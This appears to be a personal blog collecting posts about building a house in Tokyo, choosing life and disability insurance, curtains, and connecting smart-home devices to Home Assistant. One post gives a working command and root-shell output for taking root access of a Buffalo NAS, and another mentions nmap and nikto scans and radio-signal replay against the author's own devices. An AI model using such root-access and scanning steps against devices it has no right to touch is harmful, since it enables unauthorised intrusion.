There was one minor hick-up: when going through the sign-up form there was a question 本籍は日本ですか?. To this the guy wanted to say yes, but I showed him the 住民票 that says ハンガリー. He was surprised and told me that he though since I have a Japanese driving license and live here, this should be yes. So he called the insurance company, and they told him to pick no. He then asked them if there was any additional document required (like 在留カード) but the insurance company said no, nothing extra is required.

I chose to pay by card, so the sign-up flow showed a QR code that I could scan with my phone (apparently this time it was okay to scan the screen) and then register my credit card on my phone. I did appreciate this, as in the past I had to write down my credit card details on a paper form, and this was a much more secure solution.

There were two exceptions mentioned specifically: the insurance doesn’t pay for suicide in the first 3 years (I’m actually surprised it pays for suicide at all, I though it’s excluded entirely), and it also doesn’t pay if my wife (the beneficiary) kills me.

I asked about cancelling the insurance early, and he said that it’s possible without a fee (but there is no refund, as expected). However there is a rule that cancelling and then signing up for a similar plan with another company (especially if the first one was held for less than 3 years) can be problematic. I didn’t fully get the reason behind this, but it’s not like I plan to do this anyway.

I also asked about increasing the coverage: if inflation would to be higher than expected, I might want to get higher coverage 10 years from now. He said that in principal the existing contract can’t be changed, so usually it is recommended to take out a new insurance for the difference (e.g. if you want to increase coverage by 100,000 yen, then get a new insurance for that much and keep the old one as well). This works better than cancelling the old one and taking out a new, as usually starting the insurance when you are young results in lower fees.

By the end of the meeting we finalized everything and signed up for the life insurance. Content and fee is exactly the same as I wanted it. The insurance company has 10 days to review all the submitted documents, and they might ask for additional info. But all of these will go through the insurance agent, which I’m happy for (he already has my details and knows my level of Japanese). If the insurance company is fine with everything, then coverage started on the day I signed the contract.

Update

8 days after the meeting I received a text message from the insurance company telling me that the contract has been finalized, and they will be sending the insurance policy by mail soon. After this message I could also login in their app, FWD Omne, and confirmed my information there. This is also where I can update my credit card in the future.

How to get root access to a Buffalo LS720D NAS

2026-01-19T00:00:00+00:00

I recently got myself a Buffalo LS720D NAS, thanks to furusato nozei. I looked into how to get root access to it, and it seems like an older method still works now.

The exact model is Buffalo LS720DE4E (LS720D) running the currently latest firmware (2.02-0.13).

The steps are simple:

Download acp_commander.jar from this fork (this is more maintained than the original)
Run the jar to get a shell:

  java -jar acp_commander.jar -t <IP of the NAS> -m <MAC of the NAS> -pw <admin web password> -s

It gives you a root shell:

  Welcome to ACP Commander v0.6 (2021), the tool for Buffalo stock firmware control!

  Using MAC: <redacted>
  Enter commands to device, enter 'exit' to leave
  />id
  uid=0(root) gid=0(root) groups=0(root)
  />ls -la /mnt/array1
  total 8
  drwxr-xr-x 10 root root  196 Jan 17 13:23 .
  drwxrwxrwx 12 root root 4096 Jan 16 11:21 ..
  drwxrwxrwx  4 root root   63 Jan 17 13:24 backup
  drwxrwxrwx 14 root root 4096 Jan 17 13:51 photos
  drwxrwxrwx  2 root root    6 Jan  5 16:48 share
  />

According to other guides, the MAC address is optional, but I got SocketTimeoutException without specifying that.

Persistent root access is more difficult. This blogpost describes the steps of enabling the ssh service and adding your ssh public key to the trusted keys, but it concludes that on restart all the system files (including ssh config) get reverted, so you have to redo it. It recommends placing a script doing the ssh setup into a folder on the NAS, then running that via the java call after a restart.

I have seen some other guides that would patch the update to include these changes, but then you can’t easily update to newer firmware versions. So for now I’m okay to use this method to get a shell if I need to.

Setting up Ichijo's Cloud HEMS, and connecting it to Home Assistant

2026-01-15T00:00:00+00:00

We added most of Ichijo’s smart home (HEMS) options to our house and in this post I’ll review how I set them up, and connected them to Home Assistant.

This is for Ichijo’s new HEMS offering, Cloud HEMS (一条工務店クラウドHEMS), introduced in 2025. If you have a house built earlier (or much later), then these will likely be different.

Options we got

See my previous post for details, but here is the list:

EcoEye distribution board
HEMS adapter for the floor heating
HEMS adapter for the EcoCute water heater
HEMS adapter for the 24h ventilation system (ロスガード)
Air conditioners with WiFi
Panasonic Advanced Series Link Plus switches
Intercom with security cameras and e-entry entrance door (can be locked from the intercom screen)
Electric honeycomb shades
Miele dishwasher

Connecting to the network

The devices need to connect to the network. To do this, there were a few patterns.

Ethernet cable

The EcoEye distribution board and the security cameras came with Ethernet cables that were routed to the information box, so I could just plug them into my switch.

Connect to my WiFi

The EcoCute water heater, the Daikin ACs, and the Miele dishwasher all had their own mobile app that let me connect them to my home WiFi network.

Recreate the expected WiFi

The floor heating and the 24h ventilation system (ロスガード) however didn’t have an app, nor any visible way to configure their WiFi. Turns out that they were trying to connect to the WiFi network that Ichijo configured with their LTE modem. However since I removed that modem, they couldn’t reach the internet. My solution: set up a WiFi with the same SSID and password, and let them connect to that. The SSID and password were written on the back of the LTE modem. The SSID looked something like this: FS010M_123456.

Once I created this WiFi network, both the floor heating and the ventilation system connected to it successfully.

Custom connections

E-entry entrance door

This connects to the intercom with a custom method. I’m not even sure if it’s wired or wireless, but I suspect some custom radio protocol. It was already configured when we moved in.

Panasonic Advanced Series Link Plus switches

I bought their hub myself (Link Plus Wireless Adapter, リンクプラス用無線アダプタ), which connects to the switches via 920MHz radio, and to the network via Ethernet. It has its app to set up all the switches, so I used that.

Electric honeycomb shades

These are proving to be more difficult than expected. They are licensed from Hunter Douglas and made by Ichijo, however the remotes seem to be Ichijo-specific. I found a blog where someone reverse engineered the controls, and it’s a 315 MHz custom radio protocol.

I tried Broadlink RM4 Pro, as it supports 315 MHz radio, but it failed to decode the signal, and it doesn’t support replaying raw signals. If it doesn’t understand the protocol, then it won’t interact with the device.

I also tried with my Flipper Zero, and successfully recorded and replayed the signal (Read Raw, 315 MHz, AM270).

Next I will work on integrating it with Home Assistant, and I plan to write a dedicated article about this.

Official setup

Ichijo’s recommended way of using their HEMS devices is via the Mitsubishi MyMU app. Ichijo did the configuration, and 6 weeks after the hand-over they sent us the MyMU login details via paper mail. Once I logged in to the app, it could see the following devices:

floor heating, per zone (we have 2 zones on the first floor and 2 zones on the second floor)
air circulation
ACs
solar panels
EcoCute water heater

the app is a bit slow, but works. It also allows controlling them remotely, so e.g. when going home late, I can have the bath filled up by the time we arrive home (normally closing the bath plug would be an issue, but since we got the self-cleaning bathtub, it can close it by itself).

Home Assistant setup

EcoEye distribution board

Connected using echonetlite_homeassistant. It exposes a lot of solar-related metrics, but it doesn’t show per circuit power consumption (e.g. I can’t see how much electricity a given room uses). Still the solar power info can be useful for automation.

Floor heating

Connected using echonetlite_homeassistant. For each zone it has all the expected controls: on/off, and setting temperature. It also has an auto option, which the MyMu app calls 自動, but this seems unsupported: the MyMU app fails with 設定に失敗しました. 機器がこの設定に対応していません (Configuration failed. The device does not support this configuration.) and Home Assistant also fails to set it.

24h ventilation system (ロスガード)

Connected using echonetlite_homeassistant. This is only partially supported: it lets you turn it on and off, however it doesn’t let you control the mode (air circulation, heat exchange, automatic) and it doesn’t let you control the humidifier (on or off, the strength of the humidifier). It also doesn’t show the humidity and temperature of the incoming and outgoing air. All of these are available in MyMU app, but not in the Home Assistant integration.

Meanwhile the MyMU app has all the options:

Air conditioners (Daikin)

Connected using the official DAIKIN integration. Works as expected.

Advanced Series Link Plus switches

Connected using echonetlite_homeassistant. Works as expected letting me control the lights (on/off, adjust brightness of the dimmer switches).

Miele dishwasher

Connected using the official Miele integration. Exposes a lot of information, but it seems most of these are read-only. It does allow me to turn it on or off, but it doesn’t let me start it. This is not really something I would want to do from Home Assistant anyway.

This finishes the ones that I could connect to Home Assistant.

Intercom with security cameras and e-entry entrance door

These don’t connect to the HEMS system, but do have their own mobile app that allows viewing the video feeds and locking the door. It also should allow unlocking the door, but only after someone rings the intercom, however the notification for this is usually delayed, so not sure how useful this is in practice.

The cameras have TCP ports 443 and 53 open, but the website on 443 returns 500 on all path I tried. I also run nmap -A and nikto on it with no result.

The intercom has port 53, 80, 443, 8443, 49153, 49154 open, with 31194 and 44247 reported as filtered. I run nmap -A and nikto on the web ports to no avail. Port 8443 has a header Server: Panasonic Door Server/1.00 but I couldn’t find anything about this online.

EcoCute water heater

This acts as the HEMS controller (this is the main unit MyMU talks to), which means that it doesn’t respond to EchonetLite calls, so I haven’t managed to connect it to Home Assistant yet.

It has port 80 open and responds to /license, which could mean that pymitsubishi might work with it, but I haven’t tested it yet.

House prices are different from other things

2026-01-14T00:00:00+00:00

We recently built a house in Tokyo, and it made me reflect on how house prices are different than prices of other goods.

Marginal utility

We bought a second hand Toyota minivan this year for 2.6 million yen. Buying the same model new (Toyota Voxy), it has a list price of 3.2-4 million yen. Meanwhile Toyota also makes Lexus LM, a luxury minivan going for 15-20 million yen. 4-6 times more than the Voxy.

Similarly Macbook Air starts at 164,800 yen but goes up to 258,800 yen, while Macbook Pro goes from 248,800 yen to 634,800 yen. Almost 4 times as much as the entry-level Macbook Air.

For these examples (and most stuff) the marginal utility drops fast: going from a base model to a little bit better can easily double the price, while (for most people) the utility (the value of the thing) doesn’t double.

I found that houses behave differently. There is a huge fixed cost, the land: in our case we paid 68.7 million when when buying the land and 35.6 million yen for building the house (the comparison is not perfect as the former includes all fees associated with buying the land, while the latter is only the cost of the building itself, and misses registration fees and taxes, garden constructions, etc.).

Some companies build houses of the same size for as little as 15-20 million yen. We checked some of those, and they were usually bad quality to the point of major negative effect on daily life:

almost no insulation - cold in winter, hot in summer, always noisy, high electricity bill
low quality finish and equipments - breaks more easily, needs to be replaced sooner, uses more electricity, less nice to use (we had some cheap ACs in previous rental apartments)
lower build quality - gaps, structure/roof breaking sooner

Still, simply looking at the price being half as much, it wouldn’t be such a bad deal. However looking at the whole picture with the land, it would only save 10-15%. In other words by paying 10-15% more you can get a significantly better house.

Cheap houses are still being built, so some people are buying those. I think this happens when people want to live in a specific area but have a limited budget: since the land price is fixed, the only way to make it fit into their budget is to get a cheaper building. If living in the area is more important than the building quality, this can be a potential trade-off.

There is a limit to this: I have seen house makers give quotes that were higher than the price of the land in Tokyo (e.g. 100 million yen for a 150 m2 house) for fully custom houses. I would argue the marginal utility there has dropped, but maybe the main learning from this is that marginal utility is very subjective: for me going from 15 million yen to 35 million yen made sense. For others it wouldn’t make sense, or it would make sense even to go to 70 million yen.

Additional options for the house

There is a slippery slope with this thinking: when looking at additional upgrades for the house, it is easy to want to add everything. 100,000 yen for a self cleaning bathtub? 200,000 yen for the best Toto toilet? 100,000 yen for a bigger water heater tank? If one thinks in terms of 100,000 yen being only 0.1% of the overall 100 million yen budget, it’s easy to add these. But they do add up, and in the end 2-3 million yen is the same price as buying a car, so wasting that much is bad.

On the other hand some of these options are proving to be super helpful and significantly increase our daily quality of life:

we paid 1.9 million yen for our custom kitchen - with a front-open Mielle dishwasher and Gaggenau IH cooktop. The large dishwasher saves us 10-15 minutes everyday, and the IH is really nice to use and very easy to keep clean. We both love to cook, so this is a great quality of life improvement
we paid 130,000 yen for the self-cleaning bathtub - and we didn’t need to clean the bathtub since we moved in 2 months ago. Totally worth it, especially with kids that love to take a bath every day.
extra storage - 262,500 yen for the attic storage, 103,000 yen for the underfloor storage. These take up so much stuff and make it easy to keep the house organized

So overall these (and many of the other options too) seem to be totally worth it. At least for us.

Cost of labor

This is the other topic I was thinking when it comes to houses.

In some sense, it’s not that houses are expensive, but rather we got really good at making things cheap by outsourcing the manual labor to countries with low income, and standardizing everything to the point where it can be made at a low cost.

Consider this: you can buy a brand new microwave oven for less than 10,000 yen (e.g. Iris Ohyama or IKEA). Both of these are sold in Japan, so fulfill the legal requirements (e.g. won’t electrocute you) and come with warranty. The price already includes the 10% VAT and the reseller’s profit, so the manufacturing and shipping costs are even less.

Still they only cost about a day’s work at the minimal wage in Japan. So if you want to have someone install it for you, that can easily be more expensive than the device: someone will have to come to your place (takes time and transportation cost) and do the installation (presumably requiring some skill that demands more than minimal wage). Add in the overhead for organizing this (sending out the quote, having people on file that can do the installation, handling reschedules or people not being home), and you can easily be looking at 8-12 hours work. Add taxes, cost of tools, insurance, and it can easily be more than the price of the microwave.

It sounds silly that we can make a fairly complex machine for less than it costs to have someone come to your house and plug it in, but this is the world we built.

Same concept applies to other things (e.g. custom size curtains). Essentially we got really good at making things for cheap as long as all units are the same (customization has a lot of overhead and makes automatization hard) and labor can be outsourced. This made everyone in developed countries more rich than before, which in turn made the labor even more expensive in those countries.

This makes locally produced and custom things more expensive. Companies are trying to solve this problem by two ways: make the custom things somewhat standardized (e.g. semi-order instead of full order) and by outsourcing part of the process to other countries.

Recently I had a black suite made and it was relatively cheap because it was only semi-order (so they would adjust the width and length of each part, but not fully tailor the entire thing for me) and the manufacturing was done in China. It took a few months, but the cost was less than half of what a suit made in Japan costs.

Ichijo also does a similar thing: they had a lot of rules about the building and they produce the pieces of the house in their factory in the Philippines, ship them to Japan, then assemble the pieces with a crane on the land.

Compared to building the whole frame on the site this keeps the cost lower, but reduces some of the customizability.

Miscellaneous expenses while building our home in Tokyo

2026-01-11T00:00:00+00:00

We bought land in Tokyo two years ago and finished building our house in November last year. I wrote about the cost of the house already but there were some other miscellaneous expenses related to the house construction. I will cover these now.

Initial deposit

Ichijo told us that they will have some incidental expenses during the construction, so to handle those smoothly, they will take an additional 800,000 yen from the first house payment. Once the house is done and everything wraps up, then they will refund the remaining amount. They just sent me the breakdown yesterday and will refund the money on the next working day.

I was a bit surprised why they handle this differently from their regular billing, but two possible reasons I could think of:

When we finalized the design and signed the contract, then we fixed the price for the house. Since these incidental charges are only known later, they would affect the price if it would be included in that
Some of the incidental charges are tax-free expenses, like duty stamps, registration fees, subsidy applications, etc. If they would be included in Ichijo’s main invoice, we could potentially be on the hook to pay VAT on those too, while this way (Ichijo pays it on our behalf but money comes from us directly) this can be avoided. I’m not sure if this would really be a problem, but it might be.

This deposit was different than what we paid when we signed the pre-contract with Ichijo (a 1 million yen, refundable deposit). That got rolled into the payment for the house, and this 800,000 yen got taken out of the bridge loan instead.

Breakdown

Here is the overall breakdown of the miscellaneous expenses that got charged from this 800,000 yen deposit:

Charge	Charge (JP)	Amount
Design application and filing services	設計申請・届出業務	¥154,300
Construction cost rounding	工事代金へ	¥5,326
Bridge loan interest and stamp duty	つなぎ金利・つなぎ融資印紙代	¥243,274
Property registration	登記	¥290,000
Total	合計	¥692,900
Remaining amount to be refunded	お施主様への御返金	¥107,100

I got the detailed breakdown for each of these, so I will share those next.

Design application and filing services

This included some permit applications that might be specific to our land for an overall cost of ¥154,300, so it might be less for others.

Construction cost rounding

This was a bit surprising, but makes sense. The cost of the house came down to 35,605,326 yen so it makes sense that they didn’t want to worry about the change when handling the bridge loan.

Bridge loan interest and stamp duty

I already covered this in a dedicated post, the numbers match.

Property registration

This is similar to what had to be done when we bought the land: a scrivener went to the Legal Affairs Bureau (法務局) to update the real estate registry (不動産登記簿上) to include the house and the mortgage.

They provided a breakdown of the expense. Some of the money went to Legal Affairs Bureau to pay registration fees and taxes, and they listed those separately in the invoice.

Charge	Charge (JP)	Fee (incl 10% VAT)	Registration fee/tax	Total
Application procedure / Building title registration	申請手続/建物表題登記	¥96,800		¥96,800
Registration stamp duty	登録印紙代		¥2,200	2200
Ownership preservation registration	所有権保存登記	¥27,500	¥10,000	¥37,500
Change of registered owner name/details	所有権登記名義人表示変更登記	¥11,000	¥2,000	¥13,000
Additional mortgage registration	抵当権追加設定登記	¥38,500	¥1,500	¥40,000
Mortgage registration	抵当権設定登記	¥38,500	¥40,800	¥79,300
Advance review of registry records	登記簿謄本事前閲覧	¥1,650	¥1,500	¥3,150
Certified copy of registry matters	登記事項証明書	¥2,200	¥2,000	¥4,200
Residential house certificate	住宅用家屋証明書	¥6,600	¥1,300	¥7,900
Transportation and communication expenses	交通通信費	¥5,950		¥5,950
Total	合計	¥228,700	¥61,300	¥290,000

I didn’t get to choose the scrivener company (and wasn’t even asked if this was okay), the builder and banks simply went with them. I also only learned about the price after the fact. Looking at this recent article it seems this was on the expensive side. So next time I would ask the builder proactively ahead of time, get a quote from their recommended company, then get some competing quotes to see if I can save a bit.

Summary

That’s pretty much it, these were the incidental charges that came up during construction. Other than hoping that your mortgage doesn’t get delayed(which increased the bridge loan interest) and maybe getting another quote for the registration paperwork I don’t think there is anything to do about these.

We are still finishing up the exterior construction of the house and once that’s complete I will do a full summary of the entire cost of our home. Stay tuned.

Choosing my life insurance - part 1

2026-01-09T00:00:00+00:00

I wrote about the types of life insurance a while back and recently decided to sign up for one. In this post I will share my process of choosing it. Well, the first half of it, because in the end I couldn’t completed the sign-up online.

Type of insurance: Income Protection Insurance (収入保障保険)

I reviewed the types of life insurances earlier and found this to be the best match for my needs: it is a term life insurance that pays out monthly payments until the end of the term. So essentially: I pay a monthly fee from now until I turn 60, and in exchange if I die within this time period, then my family gets a monthly payment every month until I would be 60. Compared to regular term life insurance (with a lump sum payment) this is a decreasing coverage: if I die late, then it pays much less than if I die early. However this matches the needs of my family better, and it keeps the premiums reasonable (since the chance of me dying early is far lower than when I’m near 60).

Moreover I really like that it is easy to manage for my family: getting a lump sum and trying to live off of it can be stressful (how do you invest it, how much do you spend, what if markets go down or yen gets stronger), especially in an already very stressful time. Simply getting monthly payments alleviates this problem.

I also looked into disability insurance but decided not to get one.

Taxes on life insurance

I covered it in a previous post, but TLDR: as long I pay for my life insurance and my family gets it, then it is taxed as inheritance. For income protection insurance (since it’s an annuity) they calculate the present value, tax that as inheritance then treat it sort of like an investment: part of the payouts are principal (tax-free at payout) part is interest (taxed as miscellaneous income).

The inheritance part of this can be an issue: the heirs might be on the hook for inheritance tax on the future payments, but not have the money at hand. Unless someone has a lot of illiquid assets (e.g. real estate), I don’t think this would be a problem: for example with a 200,000 yen per month annuity, even if it pays out for the 28 years, the sum of all payouts would be 67.2 million yen (6,720万円). Only part of this would be in scope for inheritance, but even the full amount would be less than the spousal 160 million yen tax credit.

Sizing

So how much insurance to get? More feels better, but it’s important to keep in mind that insurance is a negative sum game (on average you will pay more than the benefits you receive - otherwise the insurance companies would go bankrupt), so it is best to limit the insurance to the catastrophic events, and invest the extra premiums that this saves.

Deciding the amount of insurance has an issue: both the premiums and the payouts are fixed in nominal terms and don’t take inflation into account. So e.g. if I conclude that my family would need 200,000 yen per month today, then in 20 years from now the same need would be appr. 300,000 yen (assuming a 2% inflation which is the target of BOJ). Thus a bit of oversizing is a good idea.

With this in mind I decided to get a coverage for 300,000 yen per month.

Term

I decided to get the insurance until I turn 60. By that time all of my kids will be in their mid-late twenties and should be independent. I could have pushed it to 65, but that last 5 years are more risky, making the premiums higher, while I don’t have a strong need for insurance during that period.

Guaranteed Minimum Payment Period (最低支払保証期間)

Another option to choose is the Guaranteed Minimum Payment Period (最低支払保証期間): if someone dies towards the very end of their term, the heirs would receive only a few months of coverage. To avoid this, most income protection insurance offers 1, 2, 5, or 10 year minimum payment period options, so even if there is less than that left from the term, it will still pay out for that long. I don’t think this is needed: if I die right before 60, I should have enough saved for retirement to make this life insurance unnecessary, so I will choose one of the lowest available option (if 1 and 2 years have the same premium, I might go with 2).

Choosing the company

My favorite comparison website, kakaku.com has a comparison page for income protection insurance. However many companies are missing, so I also did some Google search and asked ChatGPT.

Most companies require an in-person or phone interview before sining up for an insurance. I found only 3 that allows online sign-ups and offer income protection insurance:

FWD Life (FWD生命) - part of the Hong Kong-based FWD Group
Orix (オリックス生命) - part of the Japanese ORIX Group
Hanasaku Life (はなさく生命) - owned by 日本生命保険相互会社 (Nippon Life Insurance Co.)

Orix would only offer up to 150,000 yen per month payout, so they were out.

FWD Life offered it for a monthly premium of 3,946 yen.

while Hanasaku Life offered it for a premium of 4,755 yen.

I was initially a bit concerned that FWD is owned by a Hong Kong-based entity, so if the Japan-China relationship deteriorates further, then it could be affected, but the insurance is offered by the Japanese subsidiary and thus regulated by the Japanese laws, so should be fine.

FWD is meaningfully cheaper too, so I decided to go with FWD.

Fine-tuning the options for fun

I already decided my coverage, but just for fun I checked a few combinations:

Parameters	Monthly premium	Premium diff	Premium diff %
Base-case: 300,000 yen payout, until 60, 2 year guaranteed, healthy discount, non-smoker discount, no options	¥3,946	¥0	0%
Half payout: 150,000 yen	¥2,024	-¥1,922	-49%
Going until 65 (5 extra years)	¥5,174	¥1,228	31%
Going until 70 (10 extra years)	¥6,780	¥2,834	72%
Going until 80 (20 extra years, the maximum offered)	¥11,508	¥7,562	192%
Guaranteed 5 year payout	¥4,111	¥165	4%
Guaranteed 10 year payout	¥4,634	¥688	17%
Non-healthy body (BMI outside 18-27 or blood pressure over 140/90)	¥6,985	¥3,039	77%
Smoking	¥5,601	¥1,655	42%
Smoking and unhealthy body	¥9,164	¥5,218	132%
Being a woman	¥3,581	-¥365	-9%
Add-on for disability insurance (生活支援特則): it will start paying the annuity if the insured becomes disabled or require nursing care	¥8,447	¥4,501	114%
Add-on for 3-major illness premium exemption (3大疾病保険料込免除特約): if diagnosed with cancer, heart disase, or stroke, you don’t have to pay for the insurance going forward	¥4,184	¥238	6%
Add-on for Spouse Simultaneous Accidental Death Increase Rider (配偶者同時災害死亡時割増特則)	¥3,946	¥0	0%

No big surprises here. Some options feel pretty cheap, e.g. increasing the minimum payout period, but those extra costs still add up, so if I don’t need it, I won’t get it.

Add-on for Spouse Simultaneous Accidental Death Increase Rider (配偶者同時災害死亡時割増特則) is different: this is for free, and it doubles the payout if both me and my spouse dies in the same accident (disease is excluded, only accident). The chance of this is super low (and that’s why it’s free), but since it’s free I decided to add it.

I continued with FWD to do the online sign-up. The form had a bunch of questions, one of them being:

以下の臓器や検査の異常を指摘されたことがありますか。（要再検査・要精密検査・要治療を含みます。なお、再検査等の結果で異常がなかった場合も含みます。） ■心臓　■肺　■胃腸　■肝臓　■腎臓　■すい臓　■胆のう　■子宮　■乳房　■診察　■血圧測定　■尿検査　■血液検査　■肝炎ウイルス検査　■便潜血検査　■眼底検査　■胸部レントゲン検査　■上部消化管レントゲン検査　■内視鏡検査　■細胞診　■組織診　■認知機能検査　■腹部超音波検査　■CT検査　■MRI検査　■PET検診　■しゅようマーカー（CEA・AFP・CA19-9・PSA等）

which translates to

Have you ever been told that there are any abnormalities in the following organs or tests? (This includes cases where re-examination, detailed examination, or treatment is required. It also includes cases where no abnormalities are found in the results of re-examination, etc.) ■ Heart ■ Lungs ■ Gastrointestinal system ■ Liver ■ Kidneys ■ Pancreas ■ Gallbladder ■ Uterus ■ Breasts ■ Physical examination ■ Blood pressure ■ Urine test ■ Blood test ■ Hepatitis virus test ■ Fecal occult blood test ■ Fundus examination ■ Chest X-ray ■ Upper gastrointestinal X-ray ■ Endoscopy ■ Cytology ■ Histology ■ Cognitive function test ■ Abdominal ultrasound ■ CT scan ■ MRI scan ■ PET screening ■ Tumor markers (CEA, AFP, CA19-9, PSA, etc.)

Unfortunately I have to answer yes to this. Every year when I do the company health check I get a B grade for my heart as my resting heart beat is too low (bradycardia). I went to cardiologist to look into this, and the conclusion was that I have Athlete’s Heart: I have been running and cycling a lot, so when I’m sitting at the clinic (especially after I had to skip my breakfast and coffee), my heart beat is below the normal range. With my background this is expected and not something to worry about, but it still results in a B grade which translates to “minor abnormalities, no need for concern”.

After saying yes to the above question, the site told me to call them as I can’t do the sign-up online, and they want to hear the details of the abnormalities. My Japanese is not good enough to explain this over the phone though, so I will find another option.

Alternative 1: try Hanasaku

They were more expensive, but otherwise looked good (sans the website design), and their application flow doesn’t have the same question. However they also require uploading the health check results, so there is a chance they would have the same question.

Alternative 2: go to an insurance broker in person

I’m better explaining things in person than on the phone, and it seems that the main way life insurance is sold in Japan is through insurance brokers (which is also why most providers don’t allow online sign-ups). So my plan is to give that a try and see. The biggest risk here is that legally I have to fully understand the contract I’m signing, and if they want to be very strict about that, then they might reject my application. I hope that by doing my homework and going prepared, I can convince them that I understand it as well as their regular customers (who probably also don’t understand every single technical term in it). Or that they are willing to bend the rules, since they are probably paid by commission on closed sales, so as long as I’m not a risk for them, they might decide to be helpful.

Continue with part 2 here.

Disability insurance in Japan

2026-01-05T00:00:00+00:00

I wrote about life insurance a while back and getting ready to purchase one. When I asked about it at r/JapanFinance, multiple people recommended also getting disability insurance so I started a new thread about that, took a look into it in detail, and will be sharing what I found here.

The reason for disability insurance

One might get into an accident or fall ill, and become unable to work for an extended period of time. No work generally means no income, which could risk the livelihood of the entire family, if it happens to a breadwinner. The likelihood of this is generally low, but the end result is catastrophic, so it is a perfect case to get insurance for.

There are three main worries around this:

being out of work for months while recovering
never fully recovering, and living the rest of one’s life with a disability affecting one’s ability to work
dying

While all seem related, the insurance offerings are different for these three. I already covered the various life insurance options, so this post focuses on the other two.

The ideal solution

Most professionals have talent and experience in what they are doing, so their income would be much lower if they need to switch to a different profession. So if one can’t continue doing their current job, it can be a major issue, even if they can perform some other work. Thus ideally you would want to get an insurance that pays out if you are unable to continue doing your current job, however (as I will cover next) this type of coverage is not available in Japan.

Default short-term option: Accident and sickness allowance (傷病手当金)

In Japan, salaried workers can receive this if they are out of work for 4 days or more due to a non-work injury. The amount is 2/3 of your average salary (excluding bonus) of the last year (source1, source2). It has a cap of 930,000 yen on payout, affecting monthly salaries of over 1.39 million yen (the payout amount is actually based on 標準報酬月額 which has the cap).

This can pay up to 18 months.

The main benefit of this is that it is provided by default to salaried workers. The downside is that this doesn’t apply to freelancers, that the amount is 2/3rd of salary and has a cap, and that it ends after 18 months.

Default long-term option: Disability pension (障害年金)

If one gets disabled permanently, they can start receiving their pension immediately. The criteria is pretty severe and has 3 categories:

level 1 e.g. missing both hands or both feet
level 2 e.g. missing one hand or one leg
level 3 e.g. multiple fingers missing

The payout is similar to the regular pension which is pretty low, like 60,000 yen per month for national pension.

Additional short-term option: Disability Insurance (就業不能保険)

Disability Insurance (就業不能保険) (like this one from SBI) is targeting to help with the short-term problem: if you are out of work for months, they will pay. The criteria is that your doctor says that you are unable to work. Staying in hospital fulfills this, or being ordered to rest at home too. But e.g. a carpenter with broker legs might get told that they could work as a call center agent remotely, so they don’t qualify. It is up to the insurance company to decide if you qualify, which is a bit concerning for me.

Also it only starts paying out after being out of work for a set amount of days (支払対象外期間), in the case of SBI for 60 days. On average people leave the hospital after 33 days, so this means the insurance only pays out for unusually serious cases.

Overall since there is already the Accident and sickness allowance (傷病手当金), I don’t see a major point for this type of insurance. It is useful for freelancers or other non-salaried workers (as they don’t have the accident and sickness allowance) or people worried about being in hospital for more than 18 months. Even this insurance company’s website says that they only recommend it to freelancers or people with no savings (although it seems they don’t offer this type of insurance, so they might be talking against the competition a bit).

Additional long-term option: disability rider on the life insurance / income protection insurance

Many life insurance / income protection insurance allows adding an add-on to receive the benefits when once gets disabled (e.g. Sony term life, Sony income). It is usually pretty expensive (same or more than the life insurance alone), while the criteria is the same as the disability pension so pretty severe.

Overall this seems like a good option, although it leaves a big gap between not being able to do your main job and being officially disabled. But it should supplement the disability pension to the level where one can have a good life.

Employer-provided Group Long Term Disability (GLTD) plans

This was also recommended on Reddit, but it seems like a combination of the above two with an added discount due to working for a specific company. Also it might make it easier for people with existing health conditions to sign up.

My company does offer this, but I don’t like the fact that it gets cancelled if I leave the company. I want to have a life insurance / disability insurance until my kids are adults, but I don’t intend to work for the same company that long. However if I get some disease it might be difficult to get a new insurance, which could force me to stay with the same employer even if better opportunities arise. Thus I prefer to keep my insurance separate from my employer.

Insurance from abroad

None of the above covers what the ideal solution should be, so some people recommend looking for an insurance in your home country, and ensuring it has world-wide coverage.

While this can probably solve the problem, I have a major issue with it: knowing how much insurance companies like to reject claims, I’d be worried about the paperwork requirements to claim from abroad (e.g. the documents they would require from a Japanese hospital). Also if I’m in this situation, I’m probably not in the state to travel halfway across to work just to get myself diagnosed again in my home country in the hopes that those papers will be accepted by the insurance company.

Conclusion

After considering all of this, I decided against having a disability insurance. Part of this comes from the default coverage (18 months of 2/3rd salary), the affordable healthcare, and part from personal circumstances: my wife works, and we both have healthy and working parents and siblings, so if something truly terrible would to happen, I know they would help out.

Sources

Curtains for our new house

2025-12-28T00:00:00+00:00

We just finished building our house in Tokyo with Ichijo and had the handover at the end of October. One thing we had to get from a different company were the curtains.

Ichijo only does honeycomb shades

Ichijo doesn’t handle curtains, they only do honeycomb shades. They offer these in 3 levels (completely dark, medium, and lace) and in manual or electric versions. We got these for most of our windows in completely dark versions for the bedrooms, and in middle for the living room. We chose the electric versions everywhere.

It is possible to add up to 2 honeycomb shades per window, but we only added one.

The term honeycomb shade is a trademark of Hunter Douglas and Ichijo is licensing the technology and making it themselves (per some Japanese forums and our Ichijo contact). The remotes use radio (presumably 314.84 MHz), and I’m in the process of figuring out how to send the signals (but this guy found a way with Arduino/ESP8266, so should be possible).

However we also wanted to add some regular curtains: lace curtains to the bedroom windows and the balcony door in the living room. And we also had some roll curtain ideas for some of the storage space.

Ichijo’s answer was: talk to our friends at Jias.

Jias, the curtain company

We visited the Jias showroom in Shibuya, and they were very helpful. We could pick out all the curtain rails, lace curtains and roll curtains that we wanted, and they gave us really good advice. They also told us that they will coordinate with Ichijo and have everything installed by the time we get the keys to the house. This indeed happened, which was really nice, as it was one less thing to worry about.

We got rails like this (double in case we want to add two sets of curtains):

For the pantry and the storage at the genkan, we got these manual roll curtains:

Jias provided premium service, which was also reflected in their prices. Overall we paid the following:

Item	Price
Balcony door lace curtain	¥27,400
Bedroom lace curtains (3 pieces)	¥45,400
Roll curtains (2 pieces)	¥45,400
Curtain rails, double (5 pieces)	¥30,800
Installation cost	¥19,800
Misc expenses	¥5,200
Overall	¥174,000

(We only got curtains for 4 windows but added 5 rails as one of the future bedrooms is currently used as storage.)

The price included an Ichijo-partner discount of:

45% off for the lace curtains
40% off for the roll curtains
35% off for the curtain rails

So overall their list price would have been about 1.5 times more.

We actually didn’t get all the lace curtains initially, as we had some left-over curtains from previous apartments, and only after moving in did we realize that we wanted more. So we ordered the bedroom lace curtains later, but Jias let us still use the Ichijo discount.

We could have bought and installed the curtain rails ourselves, and then get curtains from somewhere like Nitori. Custom size curtains are still expensive, but it would have been definitely less than Jias. On the other hand Jias gave us great advice, and having the rails installed before we moved in was very helpful as it meant one less thing to worry about. Also good quality curtains can last a long time, so getting something higher quality can be cheaper in the end. Overall I’m happy that we went with them, and I would do it again.

